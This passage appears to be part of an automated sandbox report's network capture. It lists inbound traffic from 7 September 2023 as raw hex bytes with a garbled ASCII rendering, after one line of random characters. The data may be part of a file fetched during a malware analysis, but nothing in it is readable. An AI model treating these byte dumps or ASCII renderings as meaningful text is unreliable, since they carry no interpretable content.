j9=/82'E1$4s(zu!e/n`T~q+Ll&nQ4ZYf{cVDMkYPfWdH/2D+JVJ7^I5YdL6vKjn+@vWc""7WfhW6Qy_4G-rNX
2023-09-07 07:31:08 UTC	184	IN	Data Raw: 5b 58 a8 ce 7f 90 16 0e b3 30 e7 b6 1b 3c ce 4b 7d ae 3e 37 c3 15 73 7f e6 0b c8 ae fb 8d cc b0 2d 72 48 91 24 6c 0c 97 54 99 6c e0 b2 cc 78 6b db d1 71 12 de 68 b0 36 1d 0f 09 5d b3 ae c0 d9 1e 3c 12 d2 25 ec c6 25 9b bc 02 ca 13 f2 3c 02 0b 06 aa 9c fa f5 58 50 34 68 fb 46 6c 34 ca 37 1a b0 55 72 4d d1 ee bf 13 b0 48 30 58 a8 cc 07 98 c0 de 41 d9 69 65 34 59 ae 66 11 0b fe 01 7b 32 ed 2b 1f 81 72 ad da 89 1c 17 d6 b5 18 0d 5e c6 97 a1 c3 60 57 d5 b4 e5 94 f7 0a e0 b0 28 91 c0 a0 df d6 3c 67 1e 1d a4 e1 e3 d4 db 67 9f cb d7 dd 0d 39 81 e5 36 84 36 35 97 79 9e 0e ba cf 26 5e b6 dd 99 9a 50 cf 53 85 c8 c1 d6 69 87 ef 59 de 2f 42 75 06 c3 2e e5 9f 30 aa 10 dd d1 7c a3 00 87 f1 83 e1 fb 44 2e 4f 2a e4 54 57 54 63 1a 51 18 07 d3 84 e2 44 9c 2f 5e f2 12 9e 49 Data Ascii: [X0<K}>7s-rH$lTlxkqh6]<%%<XP4hFl47UrMH0XAie4Yf{2+r^`W(<gg9665y&^PSiY/Bu.0\|D.O*TWTcQD/^I
2023-09-07 07:31:08 UTC	185	IN	Data Raw: 6a 7f f1 31 25 ba 20 05 1e f6 c2 95 db d8 04 de 5b ef b2 f0 16 cb a4 00 25 99 62 81 ec ed e2 dd f6 41 2c cb 75 1a 68 09 3d 66 73 83 f7 68 0c 8a b8 77 2f 63 86 db 04 47 8f f5 1a f5 71 0d 34 e0 7f 78 db 0a 78 67 af 8a e4 d0 66 69 47 82 00 64 53 85 b5 83 ab c8 fe f5 71 7b 6f b9 52 38 f5 ce ce 39 f2 a9 28 fa de 35 fd af 0c 06 34 9c 3e c5 93 03 bc 6a 23 96 c1 7b b9 78 29 13 1f 4d 4f 4c 2e 12 cf b1 2a 12 b1 bd 6a d4 b4 9d e4 4d ea c2 3c f7 c0 cd cb b2 9d f8 7c f5 07 a9 51 b2 43 48 a4 24 8a 9f de 31 6f 04 e4 f2 9a 72 30 1f 7f f8 eb d8 79 71 55 24 b7 8a 91 2d 57 22 7e 64 18 eb db 2b 01 21 c1 19 fd 92 7d e4 51 ce 25 1b 58 fb 1d 61 9e f1 f4 fb b9 5e f7 e0 c2 e8 45 1b 61 2d 27 f3 7d 3d 79 b9 f0 45 22 60 58 4c 86 67 0e c5 1d 1d 06 49 b3 e4 74 24 12 d1 56 43 b4 ab 42 Data Ascii: j1% [%bA,uh=fshw/cGq4xxgfiGdSq{oR89(54>j#{x)MOL.*jM<\|QCH$1or0yqU$-W"~d+!}Q%Xa^Ea-'}=yE"`XLgIt$VCB
2023-09-07 07:31:08 UTC	186	IN	Data Raw: 0e b0 c0 0f a8 5a cd d6 0d 71 99 25 e1 93 aa 04 ba 25 52 9c 0d d1 a0 ca 97 30 96 6e c5 6f 53 2d a1 42 43 db 0b 55 ec e1 6d 3b a3 c1 a5 d2 1e 76 94 d4 02 db be b8 8f 96 37 c7 9a a6 f7 ed 82 ef aa ed ba bf f8 0a cc ea 2f b4 00 d9 f6 57 46 94 35 f6 49 73 02 bd 91 10 98 84 32 0d 75 c5 b5 94 bf de 2f 8d f9 63 91 24 37 fa 36 63 27 9f 71 70 7d 4d 4c 7c bf 66 09 38 49 7d 7d 8b f4 9e f4 44 84 2e 94 0d 57 cd 32 f0 b3 57 a5 4d d0 6d 13 bf ba 96 59 05 d7 d1 20 be 98 88 ec 6b 79 e9 ea 02 48 33 62 fe b6 62 38 88 ed 86 8f 84 c7 b0 d8 88 29 af af ab 2d 1a 2c 4c 28 b1 c2 cf eb da b2 bc 48 39 cd c9 c9 3f 21 b3 3b 9a a0 fb 49 e5 61 a5 6d 7f ea ea a5 43 ad ef fd 9a 22 ce 5b 27 36 59 2e 95 89 9a 96 42 e1 38 94 ef d2 db 29 e9 03 ae 0a 1b a9 55 02 c3 40 26 04 1d 06 2f 76 df 2c Data Ascii: Zq%%R0noS-BCUm;v7/WF5Is2u/c$76c'qp}ML\|f8I}}D.W2WMmY kyH3bb8)-,L(H9?!;IamC"['6Y.B8)U@&/v,
2023-09-07 07:31:08 UTC	187	IN	Data Raw: 89 58 9f 31 40 83 52 40 ad f2 ac 73 31 cf 74 03 f1 33 ad 27 06 10 b1 95 4d 63 c0 5b a3 d3 f4 8e d1 9c 83 ee f9 40 7b 0d f4 79 12 13 e2 e2 35 ba a2 53 00 e5 28 f9 36 1e 23 d6 1c 0f e2 9c b3 9f c9 6d ab fe 20 b3 b4 20 0b 55 0c 18 86 6c d9 52 91 06 ba 2d 28 e6 38 a7 f6 f4 a2 1b 5e d5 90 11 db ec 2e 86 9f f4 e9 ae 75 d8 3a ba 8e a9 28 e5 52 76 91 02 51 82 53 91 a1 5d f9 f4 dc 31 18 83 bc c3 0a 19 35 fa d1 df f5 fb fe fb ab f9 df 67 1e ec d1 70 1d 2d de 6d af 14 94 a9 11 a3 91 8f 87 c5 c3 98 fe b9 d4 c2 cd 22 89 4b 2e 24 ef 75 cc a7 20 3c 06 63 45 18 90 ec aa 93 6a 84 3e 61 ee 84 78 2b ff 0e 54 06 67 0e 1d 59 07 0b 9e 35 2a 11 1f a6 21 89 f5 29 14 80 fd dc 65 a7 8d 81 77 45 ab 04 8b 2c c6 ea bb df b0 e9 19 56 22 57 64 a3 b2 a8 de 72 62 a7 3d 0c da b8 95 39 ac Data Ascii: X1@R@s1t3'Mc[@{y5S(6#m UlR-(8^.u:(RvQS]15gp-m"K.$u <cEj>ax+TgY5*!)ewE,V"Wdrb=9
2023-09-07 07:31:08 UTC	189	IN	Data Raw: 84 21 3d 95 a7 c6 2e 54 e9 3d ac 68 0c aa 37 57 7a b3 63 ab 4d 7f 31 55 85 95 fd 47 03 39 3c 46 25 f2 69 e8 a7 51 af f8 25 d9 63 7a ce 00 d9 2f 23 3e 0a 50 7b bb 2f 63 da 57 5d b6 ae 0c 8c 67 19 4e e5 4f a2 44 17 e6 e6 96 4a d6 a5 65 9c 4b b0 de 2e 6e ef ff 6c 0a 02 23 77 2f 0a c1 b1 66 d4 da 0e 9b b0 0d 47 6b 90 e1 e7 ac 7a e3 3c f0 1a f9 a6 de 81 2f fb 0a a8 c2 9d 24 d2 5c 29 2d f3 eb e2 3b 58 b2 db 5b f3 64 2b 6f fd 3d bc 73 01 f2 57 3a 21 2c e7 21 75 e1 80 66 d9 df d9 a0 e5 bd f6 e4 d3 53 4e e3 71 85 ec 6b 43 1c 63 fb 94 a6 ba c7 01 19 46 61 64 66 17 f2 e9 ed 60 de fb 10 60 95 f7 47 59 f9 e1 e9 af 73 2b d1 d9 59 fe ee c8 e3 6c b1 9c c5 2b ee 03 35 88 f0 ea 35 c6 c7 e6 a4 fd 42 05 f7 9a 16 91 9e 83 3c af fb d2 33 4e 8c dc 68 1d e8 68 87 bb 92 9f ae 9a Data Ascii: !=.T=h7WzcM1UG9<F%iQ%cz/#>P{/cW]gNODJeK.nl#w/fGkz</$\)-;X[d+o=sW:!,!ufSNqkCcFadf``GYs+Yl+55B<3Nhh
2023-09-07 07:31:08 UTC	190	IN	Data Raw: f5 da ad 86 78 63 c8 cb 97 82 ba 74 bb 30 22 94 4c 95 b4 64 8a ee 87 58 58 2b b1 73 4c 1d fb 4d 00 ae 77 4c 96 49 6c 7a c2 2d 77 be c9 c4 44 10 4c 5a 9f 3a 79 3b 3f cf 67 22 70 e6 a7 29 f1 bd d5 10 52 c6 04 4a 52 3c 52 5a 29 c6 e4 26 0d da 63 f8 76 08 ef aa dd bc d1 76 69 01 1f b4 56 e4 05 7b 63 6e ef c2 ec b2 91 f9 24 0f a1 17 29 90 03 70 ad 7e ad 6a 30 90 14 0b 18 b1 a8 fd 7d f0 ad c4 46 1e c6 99 e9 6f a5 dc 3e 59 25 be 8d 76 21 4a 7c 22 62 f2 8a 72 e5 d1 e7 c7 69 39 5f d9 a5 9e 2a 7d ca 40 56 59 c7 d3 20 46 82 d9 9d ea 41 62 4c 40 05 e6 ef 49 62 bc ac 31 15 34 bd 69 37 c5 87 e4 3e 0d 32 3e 0f 4a cc ed ac 90 a9 90 3d a3 d0 16 9f f1 d2 8e a2 3a 42 c0 86 77 41 89 9f 7f 8d b3 6a 8e 04 bb 12 ed a5 04 28 5c 31 43 72 b7 d5 7b f0 b8 c6 d4 a2 b7 cb a3 a9 a4 c7 Data Ascii: xct0"LdXX+sLMwLIlz-wDLZ:y;?g"p)RJR<RZ)&cvviV{cn$)p~j0}Fo>Y%v!J\|"bri9_*}@VY FAbL@Ib14i7>2>J=:BwAj(\1Cr{
2023-09-07 07:31:08 UTC	191	IN	Data Raw: 1f 30 2f 8f e2 08 8c e3 a3 6b 9a 31 bd 7b 84 34 4e 31 82 b8 e6 d4 a6 36 e4 b3 06 05 2f bc ab 80 42 40 2e 4d dc 1d 7a b3 d7 94 5d 57 66 a9 b6 a6 b9 21 27 24 ab ee c5 2a db 66 a2 45 8e 22 22 85 aa ec 79 f7 20 5c 54 37 6c 63 34 09 02 b9 52 61 07 47 51 e8 3f 02 3e 63 23 c2 e7 6b 43 79 9e 42 59 9e 2f 0a 94 35 19 f4 36 11 3c fc 1f 2e b1 89 f3 f6 3f 88 0e 77 32 02 ab 4d ed ba 71 2a 86 5c 57 1b 73 24 25 a1 8f a7 81 12 cb e2 97 36 5c 46 3e 49 0a 44 b8 03 82 81 92 72 87 89 6f b9 56 6b d8 6a eb 16 e5 b1 aa 38 10 e9 79 17 2a 75 1d 8e e5 6f 1a ef 30 b4 a6 67 cb 10 67 77 da a3 96 2c 8c bd 53 3a 5c 60 bc d4 12 28 4a 3d c2 cf 9e 0b e9 85 f3 e3 1f 02 55 6f 84 d0 46 9c e9 f0 be aa 0f 9e 8b c2 12 08 14 f3 1c bb c4 8e e5 03 29 e9 e2 db 44 72 a7 af ce 73 da 71 2b 52 dc 4b 10 Data Ascii: 0/k1{4N16/B@.Mz]Wf!'$fE""y \T7lc4RaGQ?>c#kCyBY/56<.?w2Mq\Ws$%6\F>IDroVkj8y*uo0ggw,S:\`(J=UoF)Drsq+RK
2023-09-07 07:31:08 UTC	192	IN	Data Raw: 4b 40 26 eb 43 d5 cb f9 37 80 bc 8e c4 10 fa 9b a3 62 ea 70 dc da fb c7 40 0e 34 f5 79 ea d3 23 32 e2 cf d1 af e4 e6 ce 65 0a d0 b2 82 56 1b 7c 07 d4 9b eb 9c bb 7e ff 35 dd 35 de ef 16 84 3b 63 33 18 ee 75 93 65 55 9c e2 96 a9 ff 6e 72 dd 9d 99 0b 47 91 75 5f 2e 3e be 98 f9 9e 13 72 04 a9 3d 8b 47 fd 58 15 bf 62 67 55 4c bf f6 d6 9e ea c2 f9 bc 3d 8d 96 b6 a7 c7 2e 84 ea e2 ed ae 32 a4 85 53 e0 79 a2 cf 12 4a 5e e0 a8 f3 bb 71 a1 c4 aa 94 9f 55 28 e3 0d 56 73 cf ee 53 6c 80 3b 51 67 40 cd ed 7f 1c 18 05 54 66 9f 23 39 d4 ff de 51 19 4d 84 09 7b 8f 53 f3 b7 6e a8 6a 96 a5 06 c0 7e e5 be 92 34 5c fe 4b 74 7c f0 15 3c 0c 6d 3c a2 45 9b 8c 05 ae 63 54 32 39 da 18 67 59 02 47 e8 31 1b 0b c9 68 f6 52 6a c0 29 f3 34 6f 43 27 8c b5 b4 5e a5 8c 46 69 ed b2 74 d2 Data Ascii: K@&C7bp@4y#2eV\|~55;c3ueUnrGu_.>r=GXbgUL=.2SyJ^qU(VsSl;Qg@Tf#9QM{Snj~4\Kt\|<m<EcT29gYG1hRj)4oC'^Fit
2023-09-07 07:31:08 UTC	193	IN	Data Raw: 81 ff f7 51 d1 6b 9e 4f f9 8f 21 ec 56 d3 3b ec 2a 87 56 5f b3 a8 7a ab 9f 8e 05 c6 80 a3 24 8b 1e 8b dc 77 1a b6 2e 1b 2c 69 40 ae 17 3f 2b e9 cb e6 a8 2f 4e e8 4d 10 fb ea 17 0e b3 5c 53 cb 27 2f d8 49 7e d7 07 4e f4 0a 42 29 30 a5 bc 32 2d 45 52 a6 fe b8 29 b0 d7 59 6d c1 a4 05 0b cb 7b b4 6b 8e 98 e5 83 2a 7f 68 f3 8a Data Ascii: QkO!V;V_z$w.,i@?+/NM\S'/I~NB)02-ER)Ym{kh
2023-09-07 07:31:08 UTC	194	IN	Data Raw: 03 11 f9 d4 72 ed 9f cb b9 28 52 be 53 50 ac 73 31 ac 74 02 f0 55 ad 27 06 7b b1 95 4d 11 c0 5a a2 a6 f4 8e d1 e5 83 ea fd 3a 7b 19 e7 00 12 53 a2 a2 35 eb f3 02 00 b8 75 a4 36 7d 40 b5 1c 0f e2 1c b3 96 c0 fa ab e3 3d 21 b4 3f 14 c1 0c 00 9e f1 d9 5e 9d a3 ba 33 36 4a 38 af fe 45 a2 1e 5b 68 90 1d d7 53 2e 92 8b 41 e9 e3 39 77 3a fd c8 18 28 ab 1c c2 91 4b 16 39 53 f0 c1 f3 f9 f4 dc fb 18 86 b9 08 0a 15 39 37 d1 c7 ed 34 fe fb ab 2e df 60 19 34 d1 7e 13 f7 de 45 87 d3 94 84 3c 6b 91 ba b2 0f c3 b7 d1 6d d4 e9 e6 fc 89 66 03 fb ef 4e f7 71 20 3c 06 86 45 1c 94 09 aa 9b 62 62 3e 76 f9 63 78 2b ff fc 54 2b 7c e3 1d 6f 23 e6 9e 0c 02 fc 1f 98 0f 67 f5 11 2c 6b fd 9e 57 49 8d c7 41 aa ab 4d b1 c3 c6 a6 86 30 b0 ab 5b 95 22 1e 2c 66 b2 e3 94 a3 62 ea 70 dc da Data Ascii: r(RSPs1tU'{MZ:{S5u6}@=!?^36J8E[hS.A9w:(K9S974.`4~E<kmfNq <Ebb>vcx+T+\|o#g,kWIAM0[",fbp
2023-09-07 07:31:08 UTC	195	IN	Data Raw: ad 8b 96 1e 6c c9 d5 7d 4e 2e c6 bc 00 d5 44 80 e4 42 df b6 9b 15 8b 43 a5 f7 d9 f0 21 37 15 e0 a5 9d f5 d6 7b a4 69 b2 fd 0b af 84 5f a1 63 04 b0 75 1e fd d2 4d e2 b8 93 e6 c7 bd 07 03 b5 00 18 43 64 fd 80 1f 0d bd 53 75 ff 24 24 9e a2 6d 1f 4e 57 f2 c5 09 2e 2a ab 1b 6c 69 61 ca 77 5b 7b 28 78 ca 49 d7 e6 04 2f 0c af f7 0c e5 0f 3d ea e2 d4 64 89 fc 4e bc e3 4d 13 49 ea d6 05 6a 94 19 f3 56 49 58 e2 8f eb 01 db ee 46 d1 2b e7 75 eb 75 38 78 b1 39 c7 00 18 0f 51 05 d6 68 01 b7 c3 31 c4 81 a4 1e 91 ae 4d a6 95 81 fe 3b 78 01 0c b9 84 32 5d ba 70 b0 ee 46 d6 d5 9e 17 49 5f 1f a9 bb a9 8f b2 eb 22 cf b8 dd c1 f4 47 5d 02 c3 31 61 da ff 20 de 55 a2 3d 7c 4b f4 90 65 bb e4 30 05 25 21 e6 48 17 a4 05 1a 71 fe 91 71 6e da 75 d3 ca 6a 28 de d6 07 7c b0 64 94 53 Data Ascii: l}N.DBC!7{i_cuMCdSu$$mNW.*liaw[{(xI/=dNMIjVIXF+uu8x9Qh1M;x2]pFI_"G]1a U=\|Ke0%!Hqqnuj(\|dS
2023-09-07 07:31:08 UTC	196	IN	Data Raw: 83 78 fc c0 82 af da f3 25 21 8a 89 d5 da ed 99 56 d8 ca 7c a5 7c 5d 82 78 30 59 87 86 fd 5c 9d 47 19 fd 4b 06 a8 71 49 9e 49 75 84 ff 13 03 3e f4 fa 03 a4 c2 3a a1 bb 08 05 01 31 5a 1c 2d ef 7e f6 2e a3 08 ce 8c d8 dd 94 8c 22 8f 84 c1 ee ea 25 0d 5a 60 f8 76 88 ec aa ca 08 e6 43 88 bd 29 81 3a 88 6d cb 0e 92 52 f6 d8 ae a5 cd 74 48 7b c9 f7 4e dc ae 73 a1 73 94 ee 4e ca d1 f0 59 ad fe 7d f0 ad c4 46 1e c6 99 ff 5f 95 ee df ec f4 ec e6 ff 11 77 ad 18 83 6c 14 41 d5 e1 a9 05 a2 e3 85 03 7f 44 f0 a7 10 9a 8c 83 1d 0d c8 ae 8f da 9d ea 41 62 4c 40 05 e6 fa 61 5a 84 4d 08 49 84 3d fe 0f 99 31 ab ed 5c 63 06 37 63 81 44 65 4a 73 4e e7 79 0e cc 45 2f 08 54 78 e0 aa 28 8b 75 41 89 9f 7f 8d b3 6a 8e 17 9c 5e a0 44 aa e5 de b3 90 dc 64 8f 2d 11 16 63 8f ee 9d a6 Data Ascii: x%!V\|\|]x0Y\GKqIIu>:1Z-~."%Z`vC):mRtH{NssNY}F_wlADAbL@aZMI=1\c7cDeJsNyE/Tx(uAj^Dd-c
2023-09-07 07:31:08 UTC	197	IN	Data Raw: e8 ee 59 2b 42 6d 4c dc b1 7c 6b 81 c1 09 65 57 d8 18 7b 53 29 54 7d d0 80 b7 59 5f 8c d4 f9 6f 46 d5 54 ec 29 2b d1 23 b2 73 85 cb af ec a2 57 66 24 49 a6 b9 ba d8 24 ab 73 3a 0d fc c6 5d 6b a0 81 dd b5 85 42 86 c4 13 ff ab 03 58 c5 cb 38 32 06 ad 22 44 fb ae ea 3d cc c1 41 01 00 18 43 6b bd 61 70 68 4f d0 38 a6 ed e6 cb 09 c8 c3 fc 1f cf 4e 89 f3 13 c0 8d 0b 9c cd 10 b9 a9 12 b7 7c d8 79 52 59 ef 8c 17 17 43 70 96 b0 f5 34 d4 a1 de a3 06 01 bb f5 0b f7 c3 7d ce dd bd 78 d5 33 7c a9 25 96 b6 14 47 b4 6c 55 4a 62 25 86 63 5e b8 e2 e1 8a b8 e5 80 5f 6c 59 26 8a fa 98 20 92 53 69 70 c2 4c ac 53 35 82 43 a3 65 cf b5 52 a1 3d 61 7b 8a 77 0c 91 79 f0 aa 19 ef 22 b9 e4 91 00 41 28 78 6d 74 41 6a fc eb 76 67 4f 3b 08 99 f7 d6 61 9c 2f bb fb 20 2c 31 ec 45 ee d4 Data Ascii: Y+BmL\|keW{S)T}Y_oFT)+#sWf$I$s:]kBX82"D=ACkaphO8N\|yRYCp4}x3\|%GlUJb%c^_lY& SipLS5CeR=a{wy"A(xmtAjvgO;a/ ,1E
2023-09-07 07:31:08 UTC	198	IN	Data Raw: aa ab b2 b1 c3 c6 59 86 30 b0 54 5b 95 22 e1 2c 66 b2 1c 94 a3 62 15 70 dc da 0b de e2 ac 69 57 db 48 8e a0 74 7e 92 73 0d ac bb 6c c7 a8 8d 10 20 f4 fd 73 07 d4 64 eb 9c bb 8e e6 97 7f 68 7c 4d b4 d9 99 e2 7b 45 4c f7 f8 38 f7 3e 40 cb 0b 5d cc 94 d2 9d 99 f4 47 91 75 af 37 9c 1c c5 5b 3c b1 2f a6 0b 52 14 e5 9d c6 48 1d c0 c5 08 ee 1d 54 30 91 ea c2 06 bc 3d 8d 66 ad 05 65 6b 26 48 40 74 0c 90 06 e7 3e ac db 00 6d b0 e8 fc 42 0a 51 a0 7e a1 c4 aa 94 9f 55 27 f8 af f4 d1 6d 4c f1 ce 22 99 f3 c5 06 85 4f dd be ba a7 f6 c4 3d 81 22 db ff de 51 19 4d 84 06 60 2d f1 51 15 cc 0a c8 34 07 a4 62 eb a3 1c 30 96 fe 5c e9 d6 de 52 0e 33 0c 6d 3c a2 45 9b 83 1e 0c c1 f6 90 9b 78 ba c5 fb a0 e5 4a 73 8e a9 6b ca 54 f0 c8 62 8b e8 3b 6f 43 27 8c b5 b4 51 be 2e e4 cb Data Ascii: Y0T[",fbpiWHt~sl sdh\|M{EL8>@]Gu7[</RHT0=fek&H@t>mBQ~U'mL"O="QM`-Q4b0\R3m<ExJskTb;oC'Q.
2023-09-07 07:31:08 UTC	200	IN	Data Raw: c5 e6 a4 fd 42 05 f7 9a 16 91 9e 83 31 75 21 3a 84 28 3b 34 fe 7c 56 80 6f 53 7a 77 46 72 05 21 65 42 24 63 fb 69 df 9c f3 53 e1 f6 c7 80 bf 40 fa d5 d4 1b 3b 08 57 c9 ad 13 b2 f3 1a 16 e8 fd 4e bb ac 80 68 4b 27 78 4f fe f8 7d c3 23 bd 07 18 81 43 1a 03 63 ad 8d d1 98 d6 95 f5 7b 92 e8 8d 2a f4 e1 56 9b 94 a2 b2 cc 7c 01 50 42 0c ad 23 3c 06 f5 53 c2 60 ec 9a 02 ad 9d 77 7a 53 ae eb 78 8b df 2a 81 52 fa dc af 4e 48 97 c5 3f 87 78 72 0b 53 0b 31 7c 37 27 ee 84 c4 3d d4 ed 8e 78 76 ca 36 29 d6 ff 65 af 70 c9 a0 9a 61 e3 d2 38 c8 4c 4b 1a 2e 54 3e e7 f5 4b e2 ce 15 f3 dd 44 25 26 83 47 77 45 ee ec 9e c7 72 24 91 5d c3 81 bc 6f c0 0d 87 d1 4f 51 95 16 3e e3 a3 c5 20 12 cc d7 76 c6 16 6e 96 cc ed ac 2d 1b 27 06 29 06 2f e7 5b 63 dc f5 c8 e3 e3 2e 1a 37 e0 01 Data Ascii: B1u!:(;4\|VoSzwFr!eB$ciS@;WNhK'xO}#Cc{V\|PB#<S`wzSxRNH?xrS1\|7'=xv6)epa8LK.T>KD%&GwEr$]oOQ> vn-')/[c.7
2023-09-07 07:31:08 UTC	201	IN	Data Raw: a2 55 4c 8a 53 cf 63 be 7d 9c 55 05 03 6b 6f 3c b9 57 d2 f1 cb b0 70 0e 40 3d f4 8e a3 c5 00 97 7e 7a ce 12 16 22 c4 25 9c 5d bf e5 d3 91 0a 0e c5 0b b0 87 6d 1c 67 fb 1f b6 ff e1 61 cb 2d 5c 41 2e 59 42 1b 8b 44 3c 71 b9 44 21 93 59 d3 09 0f 57 2d b7 e2 4c 38 ae 31 60 35 f9 bd cb 86 18 0f 19 7c 4d 22 8c f3 f2 bb b3 f4 cf bf b2 05 66 70 53 69 fe b1 11 2a 9d 92 f6 39 5c dc 0d bb 60 39 9a 20 5f 4f 83 74 a3 78 4f 26 5d b0 a5 ea 4f 36 09 0a 63 f3 29 96 08 7a 89 50 18 f8 01 9c 9a 13 d3 e1 04 16 0e 1d 58 4e 8b 38 40 fa 7c 4a 41 58 fa 9b 8f f1 a6 f2 a7 4a ac 00 0e 0e 7e 5d 3e 4d 8d a8 8c bb de c1 6e ef ff 63 0a 02 23 77 2f 09 ca 78 bc 3c 32 e6 73 58 e5 af 83 78 09 0f 44 92 0b d4 18 f2 11 4e 36 69 c7 13 e2 40 7e 05 c5 3a b4 f3 e4 f8 e8 e2 3b 58 b2 db 5b f3 64 2b Data Ascii: ULSc}Uko<Wp@=~z"%]mga-\A.YBD<qD!YW-L81`5\|M"fpSi*9\`9 _OtxO&]O6c)zPXN8@\|JAXJ~]>Mnc#w/x<2sXxDN6i@~:;X[d+
2023-09-07 07:31:08 UTC	202	IN	Data Raw: 6d 8b 41 6a fc 14 76 67 4f c4 08 99 f7 29 61 9c 2f 44 fb 20 2c ce ec 45 ee 2b e4 68 fb 10 d3 bd ae bc ec ad 8e 26 35 0f ea 45 4c e8 93 cf 67 f8 36 40 0b b9 a7 40 41 8e 1f f7 14 ec a5 d7 92 f3 bc f4 c0 5c 59 91 11 92 ee 43 c9 d6 40 33 7a 37 29 45 ef f4 f0 81 f0 d9 cb 94 42 09 bd 2a 96 04 4e 2b 5d c4 62 e0 97 8d 0a 66 26 f7 0e ef 22 24 6f a8 0e 11 56 45 10 20 db fc 75 6d 34 1d 25 46 84 0e 02 b7 6e b0 95 45 9d cf a6 78 79 0a a6 64 be e0 04 b2 ff 51 88 b3 69 b6 8a bb 03 ec fc 01 08 05 fc 9b 3e c5 5e 84 f4 fa fe 0e a6 e3 d2 d0 82 09 d1 9c f4 31 73 e7 21 6b 73 1d 73 7b 3e d1 16 da f2 25 9c 07 89 f7 10 55 35 77 1a bc 77 c2 d5 7e c5 b7 91 34 f1 ad ae 09 27 79 5a 32 8b 37 84 36 08 b1 22 51 8c 5f 8c 4b 11 b1 35 2e 0f a6 5a 00 82 0f 52 3b b9 e1 39 66 00 a0 6a 11 20 Data Ascii: mAjvgO)a/D ,E+h&5ELg6@@A\YC@3z7)EB*N+]bf&"$oVE um4%FnExydQi>^1s!kss{>%U5ww~4'yZ276"Q_K5.ZR;9fj
2023-09-07 07:31:08 UTC	203	IN	Data Raw: 5f 1a b5 8c 71 56 94 35 ab 0f 37 9d 74 17 c4 90 bc d8 73 4a 4b ae 41 d1 1b 34 b0 ef 29 8f 53 ad 54 59 a6 a4 a1 50 d6 2a 00 7b fc 0e bf 7e 3c aa 88 53 06 49 9d 24 94 f1 01 ae d9 09 16 a9 f2 84 38 ad c9 f3 e5 9f ff 99 48 e3 1c 80 67 e4 55 95 3a 32 7a d7 97 d4 11 97 c8 3f fe 25 4a cf 4e ae 77 da 5a 5f ae ac 76 d2 15 d8 01 c3 16 55 e6 26 17 11 a6 d4 bd 92 d0 23 4e 83 73 7e 3e f6 65 a8 27 e7 7b ac d6 ab 7d 2f 7f 48 59 a0 73 2b f9 90 b9 2a 54 13 d6 d4 d1 dc 4d 8c 85 34 50 13 a2 a8 99 db 49 59 46 45 d8 db 54 8c 3a f2 03 39 5d 94 5f 7e dd 4a 7a bd 86 3b ec 00 ab fc a7 3a cb c7 cd f9 ad dd bb 04 ae 15 c2 33 c1 be fe ff 18 bc 94 42 61 8f 97 b0 d0 c7 59 12 e6 26 e5 21 c3 1a fb 2f 4e 6f 17 f3 c0 6b ef 7c cd f6 5d 49 12 c1 09 ab 79 52 59 ef 8c 17 17 43 70 96 b0 f5 34 Data Ascii: _qV57tsJKA4)STYP{~<SI$8HgU:2z?%JNwZ_vU&#Ns~>e'{}/HYs+TM4PIYFET:9]_~Jz;:3BaY&!/Nok\|]IyRYCp4
2023-09-07 07:31:08 UTC	205	IN	Data Raw: 24 73 b4 ff df b1 0f 28 15 1b 0b 72 57 b1 79 b9 08 0a ea 39 37 d1 38 ed 34 fe 04 ab 2e df 9f 19 34 d1 c1 13 f7 de 45 87 d3 94 84 3c 6b 91 ba b2 0f c3 b7 d1 6d d4 e9 e6 fc 89 66 03 fb ef 4e f7 71 20 3c 06 86 45 1c 94 09 aa 9b 62 62 3e 76 f9 63 78 2b ff fc 54 2b 7c e3 1d 6f 23 e6 9e 0c 02 fc 1f 98 0f 67 f5 11 2c 6b fd 9e 57 49 8d c7 41 aa ab 4d b1 c3 c6 a6 86 30 b0 ab 5b 95 22 1e 2c 66 b2 e3 94 a3 62 ea 70 dc da f4 de e2 ac 29 57 db 48 8e a0 74 7e 92 73 0d ac bb 6c c7 a8 8d bf 8d 5e fd 99 e0 30 64 01 7b 5f 8e 0c 70 9b 68 96 aa 50 d9 60 1b 83 45 b3 08 07 38 08 c1 bf cb f4 a2 33 94 2d 62 66 f4 b8 6e 8a af c8 63 e3 c5 a4 c3 4e 2f 59 f4 ad 14 1a 62 39 48 e2 3f 3a 08 11 e2 ab 30 6e 15 3d 06 43 c2 72 66 52 fa 9a 73 d9 b7 bf b0 f3 6f f9 18 c1 53 24 ff 92 4f 17 03 Data Ascii: $s(rWy9784.4E<kmfNq <Ebb>vcx+T+\|o#g,kWIAM0[",fbp)WHt~sl^0d{_phP`E83-bfncN/Yb9H?:0n=CrfRsoS$O
2023-09-07 07:31:08 UTC	206	IN	Data Raw: ee b1 c9 96 38 ec 1d bf 81 fa 3a c5 4b 0c 1b 07 17 1d c4 a7 4d 24 a4 0c 9b d4 90 02 cd 8a 56 16 95 c6 ab 6c 3b f0 36 62 f6 97 71 ce c8 ce b7 f2 aa e1 f3 c4 44 59 cd e1 f6 c4 36 54 0b 46 cf 60 5a 45 38 fe e6 b9 9e 9b 99 e8 0d 15 19 56 fb ec 89 4d d4 66 c9 47 ee f6 fe b8 64 3c c6 ce 4e e9 f9 df f4 7b a6 c2 58 63 f0 6f 44 9f e7 cf 10 32 3a 19 5b 02 bd fa 08 65 e9 6e 61 7c ce 8a de c5 7b d7 c4 cb 01 83 a9 7f 90 ac 85 88 b9 8d fa de 9a bd db 9c 04 96 23 63 0c ac d1 09 38 7f bf bf 05 2a d4 e4 c4 f7 57 36 52 ec b2 0c e5 e9 e8 19 aa 5e ac da 35 2a 27 5a 6a d5 f8 5f e6 08 bd 25 3d aa 43 38 26 48 ad af f4 b3 d6 b7 d0 50 92 ca a8 01 f4 c3 73 b0 94 80 97 e7 7c 23 75 69 0c 8f 06 17 06 d7 76 e9 60 ce bf 29 ad bf 52 51 53 8c ce 53 8b fd 0f aa 52 d8 f9 84 4e 6a b2 ee 3f Data Ascii: 8:KM$Vl;6bqDY6TF`ZE8VMfGd<N{XcoD2:[ena\|{#c8W6R^5'Zj_%=C8&HPs\|#uiv`)RQSSRNj?
